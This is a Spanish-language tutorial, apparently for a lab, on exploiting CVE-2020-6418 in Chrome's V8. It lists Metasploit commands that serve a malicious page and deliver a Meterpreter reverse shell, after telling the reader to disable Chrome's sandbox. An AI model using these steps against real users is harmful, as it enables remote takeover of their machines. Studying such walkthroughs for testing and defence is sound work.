
Exploit para CVE-2020-6418, una confusión de tipos en V8, que permite ejecución remota de código mediante una página HTML manipulada. Utiliza Metasploit para entregar un payload de shell inversa.
El CVE-2020-6418 trata sobre la confusión de tipos en V8 de Google Chrome. Las versiones afectadas fueron anteriores a 80.0.3987.122. La vulnerabilidad se logra mediante un atacante remoto que accede al shell de un dispositivo objetivo a través de una página HTML manipulada.
Nota: El navegador Google Chrome debe ejecutarse sin sandbox para que el exploit tenga éxito.
i) Crear un acceso directo para Google Chrome
ii) Hacer clic en Propiedades > ir a la opción llamada "Destino"
iii) Al final del EXE, dar un espacio e ingresar -no--sandbox
iv) Hacer clic en Aplicar > Aceptar
v) Abrir un nuevo navegador Google Chrome y verá la ventana emergente indicando lo siguiente.
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer
Dado que usamos Kali como entorno para llevar a cabo el exploit, Metasploit viene como una herramienta integrada en la distribución. Pero si usas otras distribuciones, necesitamos configurar Metasploit antes de comenzar el exploit.
Consulte la instalación de Metasploit para más información.
i) Iniciando el framework Metasploit
> msfconsole
ii) Encontrar el exploit
> search chrome_js
iii) Usar el exploit disponible de la salida anterior
> Use exploit/multi/browser/chrome_jscreate_sideeffect
iv) Proporcionar la dirección IP de SRVHOST
> set SRVHOST <ip address>
v) Proporcionar el objetivo Aquí tenemos dos opciones
> set Target " Number "
vi) Proporcionar el payload
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
vii) Para verificar la configuración actual y las opciones habilitadas.
> show options
viii) Para ejecutar el exploit
> run (or) > exploit
ix) Se le proporcionará una URL, que debe copiar en el navegador para que la sesión se active.
x) Una vez que el usuario acceda a la URL, se creará una sesión. Para verificarlo
> show sessions
xi) Usando la sesión, podemos verificar la información del sistema del usuario / ingresar al shell.
> sessions <number>
> shell